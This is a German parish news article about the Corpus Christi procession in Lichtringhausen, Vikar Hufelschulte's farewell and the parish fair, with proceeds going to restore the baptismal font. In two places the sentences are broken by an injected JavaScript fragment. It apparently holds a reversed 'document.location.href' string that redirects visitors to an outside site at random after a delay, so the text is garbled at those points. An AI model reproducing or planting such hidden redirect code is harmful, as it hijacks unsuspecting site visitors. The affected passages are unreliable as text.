Skip to content Skip to main navigation Skip to footer

Fronleichnamsprozession und Verabschiedung von Vikar Hufelschulte

Bei sonnigem Wetter fand am 23.06. die Eucharistiefeier mit anschließender Fronleichnamsprozession der Gemeinden St. Jakobus Lichtringhausen und St. Antonius Windhausen in Lichtringhausen statt.

Die von Vikar Hufelschulte festlich gestaltete Fronleichnamsprozession wurde musikalisch unterstützt durch den Musikverein Blau Weiß und den Gemischten Chor Lichtringhausen. In diesem Jahr gab es eine neue Wegführung. Der neue Schulweg wurde hier mit einbezogen und von toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dort ging es zum Musikvereinshaus, vor dem ein wunderschön gelegter Blumenteppich zu bewundern war. Vielen Dank an den Pfarrgemeinderat Windhausen, der uns hierbei tatkräftig unterstützt hat. Zum Abschluss der Prozession ging es wieder in die Kirche.

Am Ende der Eucharistiefeier erwartete Vikar Hufelschulte eine große Überraschung. Aufgrund seines Weggangs aus dem Pastoralverbund Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn verabschiedeten sich alle Vertreter der Vereine/Gremien und der Jugend aus Lichtringhausen mit Geschenken und emotionalen Abschiedsworten.

Bei dem anschließenden Pfarrfest gab es Deftiges vom Grill, reichlich Getränke und ein großes Kuchenbuffet. Auch die Kinder hatten ihren Spaß. Von Dosen werfen über Rollenrutsche und Kinderschminken gab es einiges zu entdecken. Auch hier spielte der Musikverein Blau Weiß und der Gemischte Chor Lichtringhausen gab einige Stücke aus seinem Repertoire zum Besten.

Es wurde noch bis in den frühen Abend gefeiert.

Der Erlös des Pfarrfestes wird für die Restaurierung des Taufsteins verwendet.

Wer Interesse an Fotos hat, die an diesem Tag gemacht wurden, kann sich gerne an das Redaktionsteam wenden.